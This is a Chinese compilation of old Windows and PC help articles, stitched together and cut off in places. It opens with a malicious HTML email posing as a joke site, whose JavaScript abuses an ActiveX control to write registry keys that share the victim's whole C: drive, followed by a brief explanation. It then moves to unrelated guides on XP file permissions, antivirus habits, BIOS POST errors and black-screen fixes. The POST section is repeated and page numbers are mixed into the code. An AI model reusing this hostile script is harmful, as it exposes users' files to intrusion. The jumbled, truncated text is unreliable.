〈!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"〉
〈HTML〉〈HEAD〉
〈META content="text/html; charset=gb2312" http-equiv=Content-Type〉
〈META content="MSHTML 5.00.2614.3500" name=GENERATOR〉
〈STYLE〉〈/STYLE〉
〈/HEAD〉
〈BODY bgColor=#c0c0c0〉
〈DIV align=center〉〈FONT size=4〉〈STRONG〉笑林广记笑话集〈/STRONG〉〈/FONT〉〈/DIV〉
〈DIV align=center〉〈/DIV〉
〈DIV align=left〉〈FONT size=2〉
你好!我们是笑林广记笑话网,这里有大量的XXX级笑话,绝对笑死你!欢迎访问!附件中有极品笑话N篇,友情赠送!〈A href="http://www.sexlaugh.com.cn"〉Http://www.sexlaugh.com.cn〈/A〉〈/FONT〉〈/DIV〉
〈script language=JavaScript〉
function f() //改写注册表的函数
{
24
var aa,ss;
aa=document.applets[0];
aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
aa.createInstance();
ss=aa.GetObject();
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Flags",302,"REG_DWORD");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Type",0,"REG_DWORD");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000); //每过1000毫秒就再次递归调用f()
}
init(); //调用函数
〈/script〉
〈/BODY〉〈/HTML〉
这封邮件就是利用了MS.ActiveX元件的写注册表的功能,只要你一读这封信,它就会在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\ Network\LanMan中添加了一个键值C$,并且将C
25
盘改为完全共享!
再来看一看附件Laugh.hta吧。查看了一下“文件类型”,发现“.hta”后缀名其实是HTML Application文件,可以由Mshta.exe解释执行。也是和WSH、VBS一样的文本文件,就将它导出为Txt文件如下:
〈ht
Windows XP重装后原文件夹拒绝访问的解决方法
昨天笔者因为病毒的原因重装了XP ,但重装后发现“我的文档”中的一些文件打不开,老提示拒绝访问。XP原来是装在C盘,而“我的文档”在原来的XP系统中是调整到了D盘的一个文件夹,当时这样做的目的是为了避免重装系统时忘记备份,将我的文档中的内容格式化掉。记得原来在单位用电脑时也遇到过类似的情况,只是当时没什么重要文件,也就没有想办法解决这个问题。可现在情况不一样了,那里面有许多重要的文件,而且当时将这个文件设为专用了,这可能是造成“拒绝访问”的原因。查看了一下,果然不只“我的文档”中的一些文件,以前设为专用的一些文件夹都拒绝访问,推断是由于同一原因。
是不是再新建一个同样名称的用户就能访问呢?经试验,也不行,因为在XP中,每个用户都有一个唯一的SID。
于是在网上搜索了一下,原来有许多朋友也遇到过这种问题,而且也有许多热心的朋友提供了多种解决的办法。经参考各路豪杰提供的绝招之后,又经过实践,终于总结出解决此类问题的一个良方,发在这里贡献给各位,希望对遇到同类问题的朋友有帮助。
闲言少叙,下面介绍具体解决方法。
1、以具有管理员权限的用户登录XP,在XP中打开资源管理器,选择菜单“工具|文件夹选项”,打开“文件夹选项”对话框。在对话框中单击“查看”选项卡,取消复选框“使用简单共享”。
图1 取消“使用简单共享”
2、右键单击原来设为专用的文件夹,如“i386-sp2”,从弹出菜单中选择“属性”,这时会看到在对话框中多出一个“安全”选项卡。可以看到这里有一个未知帐户,这应该就是原来XP系统中的那个帐户吧。这个帐户是能够访问该文件夹的,可问题是我们现在已经不能使用这个帐户。所以要另想办法。
图2 安全选项卡
3、单击图2所示对话框中的“高级”按钮,弹出“i386-sp2的高级安全设置”对话框,显示目前该项目的所有者为刚才看到的未知帐户。选择“将所有者更改为”下方的用户,比如笔者现在使用的用户名称,然后单击“应用”按钮,所有者就改变为现在用户了,如图3所示。
图3 更改文件夹的所有者
选中下方的“替换子容器及对象的所有者”,单击“应用”按钮,会看到有一个取得文件夹中所有文件和文件夹所有权的过程。
4、单击上述对话框中的“权限”选项卡,单击“添加”按钮,如图4所示。
图4
然后在“选择用户或组”对话框中单击“高级”按钮,再单击“立即查找”按钮,这时就会在下方列出本机中的用户或组。选择要给予权限的用户。
图5 选择用户
5、连续单击两次“确定”按钮,直到出现“i386-sp2的权限项目”对话框。在“权限”中的“完全控制”右侧选择“允许”复选框,则就会取得对该文件夹所有的控制权。单击“确定”按钮。
图6 更改权限
6、连续单击确定,直到关闭所有对话框。这样,原有的专用文件夹就可以使用现在的用户访问了。 如果还遇到不能打开文件或文件夹的问题,再试着改一下它们的只读属性,或者在如图4所示对话框中修改“有效权限”。对于个别仍然打不开的文件,可以尝试单独修改其权限。
小结:造成重装XP后某些文件或文件夹不能访问的原因,主要是在重装之前对文件或文件夹设置了访问权限或进行了加密。本文的解决办法是使用管理员身份登录,然后修改这些文件或文件夹的访问权限,使得当前用户能够完全控制它们。
防御计算机病毒十大必知步骤
1、用常识进行判断
决不打开来历不明邮件的附件或你并未预期接到的附件。对看来可疑的邮件附件要自觉不予打开。千万不可受骗,认为你知道附件的内容,即使附件看来好象是.jpg文件 -- 因为Windows允许用户在文件命名时使用多个后缀,而许多电子邮件程序只显示第一个后缀,例如,你看到的邮件附件名称是wow.jpg,而它的全名实际是wow.jpg.vbs,打开这个附件意味着运行一个恶意的VBScript病毒,而不是你的.jpg察看器。
2、安装防病毒产品并保证更新最新的病毒定义码
建议你至少每周更新一次病毒定义码,因为防病毒软件只有最新才最有效。需要提醒你的是,你所是购买的诺顿防病毒软件,不仅是更新病毒定义码,而且同时更新产品的引擎,这是与其它防病毒软件所不一样的。这样的好处在于,可以满足新引擎在侦破和修复方面的需要,从而有效地抑制病毒和蠕虫。例如,赛门铁克的所有产品中都有“实时更新”(LiveUpdate)功能。
3、首次安装防病毒软件时,一定要对计算机做一次彻底的病毒扫描
当你首次在计算机上安装防病毒软件时,一定要花费些时间对机器做一次彻底的病毒扫描,以确保它尚未受过病毒感染。功能先进的防病毒软件供应商现在都已将病毒扫描做为自动程序,当用户在初装其产品时自动执行。4、插入软盘、光盘和其他可插拔介质前,一定对它们进行病毒扫描。
确保你的计算机对插入的软盘、光盘和其他的可插拔介质,及对电子邮件和互联网文件都会做自动的病毒检查。
5、不要从任何不可靠的渠道下载任何软件
这一点比较难于做到,因为通常我们无法判断什么是不可靠的渠道。比较容易的做法是认定所有较有名气的在线图书馆未受病毒感染,但是提供软件下载的网站实在太多了,我们无法肯定它们一定都采取了防病毒的措施,所以比较保险的办法是对安全下载的软件在安装前先做病毒扫描。
6、警惕欺骗性的病毒
如果你收到一封来自朋友的邮件,声称有一个最具杀伤力的新病毒,并让你将这封警告性质的邮件转发给你所有认识的人,这十有八九是欺骗性的病毒。建议你访问防病毒软件供应商,如赛门铁克的网站www.symantec.com/avcenter, 证实确有其事。这些欺骗性的病毒,不仅浪费收件人的时间,而且可能与其声称的病毒一样有杀伤力。
7、使用其它形式的文档,如.rtf(Rich Text format)和.pdf(Portable Document format)
常见的宏病毒使用Microsoft Office的程序传播,减少使用这些文件类型的机会将降低病毒感染风险。尝试用Rich Text存储文件,这并不表明仅在文件名称中用.rtf后缀,而是要在Microsoft Word中,用“另存为”指令,在对话框中选择Rich Text形式存储。尽管Rich Text format依然可能含有内嵌的对象,但它本身不支持Visual Basic Macros或Jscript。而pdf文件不仅是跨平台的,而且更为安全。当然,这也不是能够彻底避开病毒的万全之计。
8、不要用共享的软盘安装软件,或者更为糟糕的是复制共享的软盘
这是导致病毒从一台机器传播到另一台机器的方式。同时,该软件没有注册也会被认为是非正版软件,而我们基本可以较为合理地推断,复制非法软件的人一般对版权法和合法使用软件并不在乎,同样,他们对安装和维护足够的病毒防护措施也不会太在意。盗版软件是病毒传染的最主要渠道。
9、禁用Windows Scripting Host
Windows Scripting Host(WSH) 运行各种类型的文本,但基本都是VBScript或Jscript。换句话说,Windows Scripting Host在文本语言之间充当翻译的角色,该语言可能支持ActiveX Scripting界面,包括VBScript, Jscript或Perl,及所有Windows的功能,包括访问文件夹、文件快捷方式、网络接入和Windows注册等。许多病毒/蠕虫,如Bubbleboy和KAK.worm使用Windows Scripting Host,无需用户点击附件,就可自动打开一个被感染的附件。
10、使用基于客户端的防火墙或过滤措施
如果你使用互联网,特别是使用宽带,并总是在线,那就非常有必要用个人防火墙保护你的隐私并防止不速之客访问你的系统。如果你的系统没有加设有效防护,你的家庭地址、信用卡号码和其它个人信息都有可能被窃取。
BIOS自检与开机故障相关问题
什么是POST上电自检?
POST上电自检:是微机接通电源后,系统进行的一个自我检查的例行程序。这个过程通常称为POST上电自检(Power On Self Test)。对系统的几乎所有的硬件进行检测。
POST是如何进行自检测的?
主板在接通电源后,系统首先由(Power On Self Test,上电自检)程序来对内部各个设备进行检查。在我们按下起动键(电源开关)时,系统的控制权就交由BIOS来完成,由于此时电压还不稳定,主板控制芯片组会向CPU发出并保持一个RESET(重置)信号,让CPU初始化,同时等待电源发出的POWER GOOD信号(电源准备好信号)。当电源开始稳定供电后(当然从不稳定到稳定的过程也只是短暂的瞬间),芯片组便撤去RESET信号(如果是手动按下计算机面板上的Reset按钮来重启机器,那么松开该按钮时芯片组就会撤去RESET信号),CPU马上就从地址FFFF0H处开始执行指令,这个地址在系统BIOS的地址范围内,无论是Award BIOS还是AMI BIOS,放在这里的只是一条跳转指令,跳到系统BIOS中真正的启动代码处。系统BIOS的启动代码首先要做的事情就是进行POST(Power On Self Test,加电自检),由于电脑的硬件设备很多(包括存储器、中断、扩展卡),因此要检测这些设备的工作状态是否正常。
这一过程是逐一进行的,BIOS厂商对每一个设备都给出了一个检测代码(称为POST CODE即开机自我检测代码),在对某个设置进行检测时,首先将对应的POST CODE写入80H(地址)诊断端口,当该设备检测通过,则接着送另一个设置的POST CODE,对此设置进行测试。如果某个设备测试没有通过,则此POST CODE会在80H处保留下来,检测程序也会中止,并根据已定的报警声进行报警(BIOS厂商对报警声也分别作了定义,不同的设置出现故障,其报警声也是不同的,我们可以根据报警声的不同,分辨出故障所在。
POST自检是按什么顺序进行检测的?
POST自检测过程大致为:加电-CPU-ROM-BIOS-System Clock-DMA-64KB RAM-IRQ-显卡等。检测显卡以前的过程称过关键部件测试,如果关键部件有问题,计算机会处于挂起状态,习惯上称为核心故障。另一类故障称为非关键性故障,检测完显卡后,计算机将对64KB以上内存、I/O口、软硬盘驱动器、键盘、即插即用设备、CMOS设置等进行检测,并在屏幕上显示各种信息和出错报告。在正常情况下,POST过程进行得非常快,我们几乎无法感觉到这个过程。
POST自检测代码含义是什么?
当系统检测到相应的错误时,会以两种方式进行报告,即在屏幕上显示出错信息或以报警声响次数的方式来指出检测到的故障。
CMOS battery failed(CMOS 电池失效)。
原因:说明CMOS 电池的电力已经不足,请更换新的电池。
CMOS check sum error-Defaults loaded(CMOS 执行全部检查时发现错误,因此载入预设的系统设定值)。
原因:通常发生这种状况都是因为电池电力不足所造成,所以不妨先换个电池试试看。如果问题依然存在的话,那就说明 CMOS RAM 可能有问题,最好送回原厂处理。
Display switch is set incorrectly(显示开关配置错误)。
原因:较旧型的主板上有跳线可设定显示器为单色或彩色,而这个错误提示表示主板上的设定和 BIOS 里的设定不一致,重新设定即可。
Press ESC to skip memory test(内存检查,可按ESC键跳过)。
原因:如果在 BIOS 内并没有设定快速加电自检的话,那么开机就会执行内存的测试,如果你不想等待,可按 ESC 键跳过或到 BIOS 内开启 Quick Power On Self Test。
HARD DISK initializing【Please wait a moment...】(硬盘正在初始化 请等待片刻)。
原因:这种问题在较新的硬盘上根本看不到。但在较旧的硬盘上,其启动较慢,所以就会出现这个问题。
HARD DISK INSTALL FAILURE (硬盘安装失败)。
原因:硬盘的电源线、数据线可能未接好或者硬盘跳线不当出错误 ( 例如一根数据线上的两个硬盘都设为 Master 或 Slave。)
Secondary slave hard fail (检测从盘失败)。
原因:1 CMOS 设置不当(例如没有从盘但在CMOS里设有从盘) 2 硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当。
Hard disk(s) diagnosis fail (执行硬盘诊断时发生错误)。
原因:这通常代表硬盘本身的故障。你可以先把硬盘接到另一台电脑上试一下,如果问题一样,那只好送修了。
Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)(无法驱动软驱)。
原因:软驱的排线是否接错或松脱?电源线有没有接好?如果这些都没问题,那买个新的吧。
Keyboard error or no keyboard present(键盘错误或者未接键盘)
原因:键盘连接线是否插好?连接线是否损坏?
Memory test fail (内存检测失败)
原因:通常是因为内存不兼容或故障所导致。
Override enable-Defaults loaded ( 当前CMOS设定无法启动系统,载入 BIOS 预设值以启动系统)。
原因:可能是你在BIOS内的设定并不适合你的电脑( 像你的内存只能跑100MHz但你让它跑133MHz ),这时进入 BIOS 设定重新调整即可。
Press TAB to show POST screen (按 TAB 键 可以切换屏幕显示)
原因:有一些 OEM 厂商会以自己设计的显示画面来取代 BIOS 预设的开机显示画面,而此提示就是要告诉使用者可以按TAB来把厂商的自定义画面和BIOS预设的开机画面进行切换。
Resuming from disk,Press TAB to show POST screen(从硬盘恢复开机,按TAB显示开机自检画面)。
原因:某些主板的BIOS 提供了 Suspend to disk(挂起到硬盘)的功能,当使用者以 Suspend to disk 的方式来关机时,那么在下次开机时就会显示此提示消息。
BIOS ROM checksum error-System halted(BIOS 程序代码在进行总和检查 ( checksum ) 时发现错误,因此无法开机)
原因:遇到这种问题通常是因为 BIOS 程序代码更新不完全所造成的,解决办法重新刷写烧坏主板 BIOS。
HARD DISK initizlizing 【Please wait a moment...】(正在对硬盘做起始化 ( Initizlize ) 动作)
原因:这种讯息在较新的硬盘上根本看不到。但在较旧型的硬盘上,其动作因为较慢,所以就会看到这个讯息。
POST自检响铃次数是如何定义的?
POST上电自检还会通过报警声响次数的方式来指出检测到的故障。但需要注意:由于目前主板BIOS类型大致可分为AWARD公司、AMI公司、PHOENIX公司(AWARD已与PHOENIX合并),因此不同类型的BIOS,其自检响铃次数所定义的自检错误是不一致的,因此一定要分清。
POST自检发现错误后如何提示?
POST自检如发现有错误,将按两种情况处理:对于严重故障(致命性故障)则停机,此时由于各种初始化操作还没完成,不能给出任何提示或信号;对于非严重故障则给出提示或声音报警信号(以上介绍),等待用户处理。通过BIOS自检功能(POST自检),我们就可以方便的侦测出主板的故障所在,以便正确的解决。
如我们按下电源键后,只有电源指示灯亮,电脑屏幕没有任何反映,也没有报警声;那么针对这种情况,我们又应如何解决呢?
屏幕没有显示,也没有报警声,我们就无法从POST自检功能得到相应的信息;大家都知道,计算机是一个复杂而且精密的产品组合,因此一个环节出现问题,可能都无法启动机器(我们主要谈硬件方面)。因此,如出现黑屏,无报警声响的故障现象,我们就应根据电脑的启动过程来分析问题所在了。
电脑的启动过程是什么?
我们在按下启动键时,首先启动的应是电源(因为如果没有电源供电,那么主板上所有的配件都是无法工作的)。但是为了保证安全使用,电源部分采取了一系列安全保护措施;因此开关电源从起振到稳定之间会有一段时间的延迟,等待各组电压都稳定下来后,电源各部分会输出一个检测信号,这个信号为高电平时表示该部分电压正常,这些部分包括输入电压和各组输出电压。这些信号总和的结果就是一个POWER GOOD信号(也称为POWER OK或PWR OK信号);如果主板接受不到这个信号,那么时钟芯片会持续向CPU发送复位(RESET)信号(与我们按下RESER键相当),CPU就不会工作。
当CPU接受到正常的POWER GOOD信号,主板和CPU就启动了吗?其实主板此时,还要根据CPU的VID0-VID3引脚的定义组合,将CPU所提供的VID0-VID3信号送到电源管理模块的相应的端口;如果主板BIOS具有可设定CPU电压的功能,主板会按时设定的电压与VID的对应关系产生新的VID信号并送到电源管理模块芯片,电源管理模块将根据设定并通过DAC电压将其转换为基准电压,再经过场效应管轮流导通和关闭,将能量通过电感线圈送到CPU,最后再经过调节电路使用输出电压与设定电压值相当。
由于CPU还要根据自己所需要的频率,通过IC总线来检测主板频率发生器所设置的频率是否支持;因为电脑要进行正确的数据传送以及正常的运行,没有时钟信号是不行的,时钟信号在电路中的主要作用就是同步;因为在数据传送过程中,对时序都有着严格的要求,只有这样才能保证数据在传输过程不出差错。时钟信号首先设定了一个基准,我们可以用它来确定其它信号的宽度,另外时钟信号能够保证收发数据双方的同步。对于CPU而言,时钟信号作为基准,CPU内部的所有信号处理都要以它作为标尺,这样它就确定CPU指令的执行速度;如CPU本身的频率无法适应频率发生器所提供的高频率,也是无法正常工作的。因此只有当接受到POWER GOOD信号,和相应的得到CPU工作的电压时以及相应的时钟频率后,CPU才能正常的工作,也就是开始执行BIOS程序。
如何判断、解决故障所在?
因为如接受不到POWER GOOD信号,系统就一直处理RESET(复位)循环中,因此主板也就无法启动,相应的其它硬件,如显卡也无法工作,显示器由于接受不到显卡传出的信号,因此也就没有显示,一直处于待机状态。此时,我们应检测电源,不要以为电源灯亮,就表明电正常,因为只要有一路信号有故障(该部分电路不正常或还未稳定),输入出的POWER GOOD信号都为低电平,即表示电源部分有故障或还未进入稳定状状;虽然电源指示灯亮,但由于主板接受不到正常的POWER GOOD信号,也无法启动。我们检测电源的方法是,使用可正常工作的电源测试。如电源为ATX型我们可用导线将13与14脚短接,如电源风扇能正常运行,则表明电源是完好的,则故障应在主板上。
更换正常电源后,如系统还是没有工作的显象,应按以上主板启动过程,测试CPU的电源管理模块和频率发生器。但由于我们不可能有完善的设备来测试主板上的电源和频率模块(大多数电脑爱好者不可能有此类设置,和具有相应的检测能力)。因此我们对此还要采用排除法,即在其它正常主板上测试CPU。测试排除CPU的故障外,还应检测主板频率设置问题。电脑爱好者为使用或测试CPU的超频能力,会通过调整主板外频的方式(目前CPU已经锁频,只能设置外频,而无法设置倍频),来调高CPU的工作频率。如果CPU无法适应高工作频率,虽然电源供电正常,主板也是无法启动的。
排除了其它硬件的问题,为会么系统仍不可启动?
如果硬件一切正常(经测试),那么在POST上电自检测后,CPU会从地址FFFF0H处开始执行指令,这个地址在系统BIOS的地址范围内,无论是Award BIOS还是AMI BIOS,放在这里的只是一条跳转指令,跳到系统BIOS中真正的启动代码处。由于BIOS是连接操作系统和硬件之间的桥梁,为计算机提供最低级的、最直接的硬件控制,计算机的原始操作都是依照固化在BIOS里的内容(指令)来完成的。因此如BIOS文件破坏或BIOS芯片损坏,都会直接的影响主板的启动。
如何判断BIOS已经损坏?
判断BIOS是否正常比较困难,因为如没有编程器等测试工具;是无法通过感官来判断BIOS文件或芯片是否正常的,对于普通用户而言,只有寻找维修商来解决了。
如果屏幕显示BIOS ROM checksum error-System halted(BIOS 程序代码在进行总和检查 ( checksum ) 时发现错误)的提示时,应是读取BIOS时,校验总和出错,因此无法启机器。这种问题通常是因为 BIOS 程序代码更新不完全所造成的,解决办法重新刷写烧坏主板 BIOS。
什么是BIOS checksum校验总和?
Checksum(校验总和)是在数据处理和数据通信领域中一个简单易行的完整性控制方法。通过一系列算术或逻辑操作将数据的所有字节组合起来,得到一个校验和值。以后可以通过相同的方法计算出校验和值并与上次计算出的值进行比较。若相等,说明数据没有改变;若不等,说明数据已经被修改了。
其它使系统无法启动的原因?
通常情况下在调入BIOS后,对电脑开启时的检测、初始化系统设备、装入操作系统并调度操作系统向硬件发出的指令都是由BIOS来完成的,而且一些硬件检测也可通过POST自检来显示工作是否正常,是否一些开机前的问题都可解决了。其实不然,因为在CPU调入BIOS后,但还需要检测640K基本内存以及各插槽的中断;虽然如内存错误POST可以通过报警声来提示我们,但如内存内部损坏或短路,会造成主板局部短路,还是不能启动机器的;因此对于系统无显示、无报警声的处理,除了基本上排除方式外,还需要平时的经验积累。
由于超频,机器无法启动,应如何解决?
对于超频无法启动机器,清除频率设置有两种方式;一种是清除CMOS设置(针对可在CMOS中设置CPU工作频率的方式);只要在主板上找到CMOS清除跳线(一般情况下在主板电池旁边,为一三针跳线),将CMOS清除后,重新恢复跳线位置,即可解决。另外一种方式是重新设置频率设置跳线(针对通过主板频率跳线设置CPU频率的方式),只要按说明书重新设置正常的频率即可。
主板侦错卡是一种什么检测工具?
主板侦错卡是一种专业硬件故障检测设备,利用其自身的硬件电路读取80H地址内的POST CODE,并经译码器译码,最后由数码LED指示灯将代码一一显示出来,其原理与POST自检是一致。这样就可以通过DEBUG卡上显示的16进制代码判断问题出在硬件的那一部分,而不用仅依靠计算机主板那几声单调的警告声来粗略判断硬件错误了。而且由于侦错卡是利用自身的BIOS POST程序,来读取诊断端口的POST代码,因此不受主板BIOS芯片限制,可以在主板BIOS损坏的情况下,正常诊断;并且利用侦错卡自身的发光二级管,来显示各组电压工作状态。通过它可知道硬件检测没有通过的是内存还是CPU,或者是其他硬件,方便直观地解决棘手的主板问题。
目前的主板侦错卡通常带有ISA和PCI两种接口,可以方便的使用在任何一种主板,而且插反后不会烧毁主板或侦错卡(非常适合于初级用户);卡上有两位数字LDE提示灯;倘若电脑无法启动时将其插入故障主板的相应插槽中,接通电源后,根据LED指示灯最后停滞的数字,参照随卡附带的故障列表手册,就能知道主板故障所在。而且最新的侦错卡,可以通过侦错卡的主板运行检测灯,方便的检测出是主板本身的故障,还是主板上其它硬件的故障。
如何使用主板侦错卡?
首先把DEBUG卡插到故障主板上,CPU、内存、扩充卡都不插,只插上主板的电源,此时,主振灯应亮,否则主板不起振;复位信号灯应亮半秒种后熄灭,若不亮,则主板无复位信号而不能用,如果常亮,则主板总处于复位状态,无法向下进行,初学者常把加速开关线当成复位线插到了复位插针上,导致复位灯常亮,复位电路损坏也会导致此故障;分频信号灯应亮,否则说明分频部分有故障;+5V、-5V、+12V、-12V(新式卡多了+3V、-3V)四个(六个)电源指示灯应足够亮,不亮或亮度不够,说明开关电源输出不正常,或者是主板对电源短路或开路;BIOS信号灯因无CPU不亮是正常的,但若插上完好的CPU后,BIOS灯应无规则的闪亮,否则说明CPU坏或跳线不正确或主板损坏。DEBUG 2000的这一功能相当有效,象-5V、-12V的电压值在PC组件中极少用到,新攒的或使用已久的PC电源,其-5V和-12V可能已经损坏,平时虽相安无事,出了问题却会让你头疼,现在,通过DEBUG卡上的批示灯就可方便地解决这个问题。排除了以上简单的故障后,把有关的扩展卡插上(一般是只组成最小系统),根据开机后显示的代码,就可以直接找到有问题的配件,从而方便地解决装机时出现的硬件错误,比如内存、显卡、CPU等硬件的接触错误,BIOS,CPU缓存的功能错误等。
我的新主板为何找不到IDE设置,应如何解决?
这是由于当前的硬盘的容量和速度不断提升,无论功耗还是对供电电流的要求都大大的增加了,而且硬盘从关机(POWER OFF)到启动(POWER ON)到初始化完成,需要的时间也增加了,但是主板BIOS执行时从开机到检测到IDE设备的时间并没有增加,这便导致了主板无法检测到硬盘或因为检测硬盘耗时太长而延迟了检测其它IDE设备的时间,特别是在连接有两块或更多的硬盘系统上,这种问题更加明显,此时倘若按下RESET 复位键,由由于各IDE设备均已经完成初始化工作,因此该故障不再出现。 对此,只要开机时进入CMOS SETUP界面,找到“Boot Delay Time”选项(注:有些厂商的BIOS为“IDE Delay Time”),将其延迟时间适当延长即可。对于没有此选项的主板BIOS,也可以在CMOS SETUP选项中将内存自检次数设为三次并开启Flooy Seek,增加IDE初始化时间。
电脑经常重启,而且多发生在读盘的时候,与BIOS有关吗?
应与BIOS设置无关的,这主要是由于电源功率不足,造成电压波动而引起的;因为一些质量较差的电源在空载时电压正常,但由于电源不足,一加负载(读取硬盘时,需要很大的工作电流),电压即会下降,因而引起重启。更换一个高质量、大功率电源即可解决。
为什么显示“Dimm 3&4 Conflict.Turn off power and remove DIMM 4”提示?
一般是在升级内存后出现这种提示的,主要是由于主板的第3和第4内存插槽共享BANK的缘故。对于这种情况,只有更换内存条(单面内存条)才可解决。
黑屏故障
计算机显示器出现黑屏是用户在使用计算机中经常遇到的问题。由于它的成因较为复杂,有可能涉及到计算机硬件中主板、CPU内存、显示卡、显示器等几大部件,故许多人对其故障出现后该如何解决颇有束手无策之感。下面我将结合自己对显示器黑屏故障处理的一些经验来谈谈对这类故障的分析与处理方法。
显示器黑屏故障按其故障成因可分为由电脑硬件故障引起的黑屏故障和电脑软件故障引起的黑屏故障两大类。其中电脑硬件故障引起的黑屏故障较为常见,而电脑软件故障引起的黑屏故障不易见,且对初学者而言较显繁琐、较为专业。下面我们就分别对其进行论述。
一、电脑硬件故障引起的黑屏故障
由电脑硬件故障引起的黑屏故障又可分为以下两大类:
一、电脑主机故障引起的黑屏故障
1、主机电源引起的故障
主机电源损坏或主机电源质量不好引起的黑屏故障很常见。例如,当添加了一些新设备之后,显示器便出现了黑屏故障,排除了硬件质量及兼容性问题之后电源的质量不好动力不足是故障的主要起因,更换大动率质优电源或使用稳压电源是解决这类故障的最好办法。
2、配件质量引起的故障
电脑配件质量不佳或损坏,是引起显示器黑屏故障的主要成因。如内存,显示卡,主板、CPU等出现问题肯定可能引起黑屏故障的出现。其故障表现为显示器灯呈橘黄色,此时可用替换法更换下显示卡,内存、CPU,主板等部件试试,这是最简便、快捷的解决办法。
3、配件间的连接质量
内存,显示卡等与主板间的插接不正确或有松动,灰尘等造成接触不良是引发黑屏故障的主要原因。而且显示卡与显示器连接有问题,或驱动器的数据线接反也可能引发黑屏故障。
4、超频引起的黑屏故障
过度超频或给不适合于超频的部件进行超频不仅会造成黑屏故障的产生,严重时还会引起配件的损坏。若过度超频或给不适合于超频的部件超频后散热不良或平常使用中因风扇损坏导致无法给CPU散热等等都会造成系统自我保护死机黑屏。
二、显示器自身故障引起的黑屏故障
1、交流电源功率不足
外部电源功率不足,造成一些老显示器或一些耗电功率大的显示器不能正常启动,是显示器自身故障引起的黑屏故障原因之一。或者外部电源电压不稳定,电压过高过低都可能造成显示器工作不稳定、甚至不工作。
2、电源电路故障
显示器的开关电路以及其他电路出现故障是引起显示器黑屏故障的主要成因。如保险丝熔断,整流桥开关管被击穿,限流保护电阻烧断等故障导致显示器无法工作。
3、 显像管、行输出电路的损坏
显像管或行输出电路出现故障也会引发显示器加电无光栅黑屏的故障,也是引起显示器黑屏故障的主要成因。
二、电脑软件故障引起的黑屏故障
如软件冲突,驱动程序安装不当,BIOS刷新出错,CMOS设置不正确等都可引起黑屏故障。此外,如恶性病毒引起硬件损坏(如CIH)等等都有可能引起显示器黑屏故障的出现。 到这类故障时若能多考虑一下故障的成因,做到解决故障知已知彼事半功倍。
三、显示器黑屏故障解决思路
1、检查主机电源,工作是否正常。首先,通过杳看主机机箱面板电源指示灯是否亮,及电源风扇是否转动来确定主机系统有没有得到电源供应。其次,用万用表检查外部电压是否符合要求,电压过高或过低都可能引起主机电源发生过压或欠压电路的自动停机保护。另外,重点检查电源开关及复位键的质量以及它们与主板上的连线的正确与否都有很重要,因为许多劣质机箱上的电源开关及复位键经常发生使用几次后便损坏,造成整机黑屏无任显示。若电源损坏,则更换电源便可解决。
2、检查显示器电源是否接好。显示器加电时有“嚓”的一声响,且显示器的电源指示灯亮,用户移动到显示器屏幕时有“咝咝”声,手背汗毛竖起。
3、检查显示器信号线与显示卡接触是否良好。若接口处有大量污垢,断针及其它损坏均会导致接触不良,显示器黑屏。
4、检查显示卡与主板接触是否良好。若显示器黑屏且主机内喇叭发出一长二短的蜂鸣声,则表明显示卡与主板间的连接有问题,或显示卡与显示器这间的连接有问题,可重点检查其插槽接触是否良好槽内是否有异物,将显示卡换一个主板插槽进行测试,以此判断是否插槽有问题。
5、检查显示卡是否能正常工作。查看显示卡上的芯片是否能烧焦,开裂的痕迹以及显示卡上的散热风扇是否工作,散热性能是否良好。换一块工作正常的显示卡,用以排除是否为显示卡损坏。
6、检查内存条与主板的接触是否良好,内存条的质量是否过硬。如果计算机启动时黑屏且主机发出连续的蜂鸣声,则多半表明内存条有问题,可重点检查内存和内存槽的安装接触情况,把内存条重新拔插一次,或者更换新的内存条。
7、检查机箱内风扇是否转动。若机箱内散热风扇损坏,则会造成散热不良,严重者会造成CPU及其它部件损坏或电脑自动停机保护,并发出报警声。
8、检查其他的板卡(如声卡、解压卡、视频、捕捉卡)与主板的插槽是否良好以及驱动器信号线连接是否正确。这一点许多人往往容易忽视。一般认为,计算机黑屏是显示器部分出问题,与其他设备无关。实际上,因声卡等设备的安装不正确,导致系统初始化难以完成,特别是硬盘的数据线接口,也容易造成无显示的故障。
9、检查CPU是否超频使用,CPU与主板的接触是否良好,CPU散热风扇是否完好。若超频使用导致黑屏,则把CPU跳回原频率就可以了。若接触不良,则取下CPU须重新安装,并使用质优大功率风扇给CPU散热。
10、检查参数设置。检查CMOS参数设置是否正确,若CMOS参数设置不当而引起黑屏,计算机不启动,则须打开机箱,动手恢复CMOS默认设置。
11、检查是否为病毒引发显示器黑屏。若是因病毒造成显示器黑屏,此时可用最新版杀毒软件进行处理,有时需重写BIOS程序。
12、若是显示器内部电路故障导致黑屏或显像管损坏,则应请专业人员维修。
什么是POST上电自检?
POST上电自检:是微机接通电源后,系统进行的一个自我检查的例行程序。这个过程通常称为POST上电自检(Power On Self Test)。对系统的几乎所有的硬件进行检测。
POST是如何进行自检测的?
主板在接通电源后,系统首先由(Power On Self Test,上电自检)程序来对内部各个设备进行检查。在我们按下起动键(电源开关)时,系统的控制权就交由BIOS来完成,由于此时电压还不稳定,主板控制芯片组会向CPU发出并保持一个RESET(重置)信号,让CPU初始化,同时等待电源发出的POWER GOOD信号(电源准备好信号)。当电源开始稳定供电后(当然从不稳定到稳定的过程也只是短暂的瞬间),芯片组便撤去RESET信号(如果是手动按下计算机面板上的Reset按钮来重启机器,那么松开该按钮时芯片组就会撤去RESET信号),CPU马上就从地址FFFF0H处开始执行指令,这个地址在系统BIOS的地址范围内,无论是Award BIOS还是AMI BIOS,放在这里的只是一条跳转指令,跳到系统BIOS中真正的启动代码处。系统BIOS的启动代码首先要做的事情就是进行POST(Power On Self Test,加电自检),由于电脑的硬件设备很多(包括存储器、中断、扩展卡),因此要检测这些设备的工作状态是否正常。
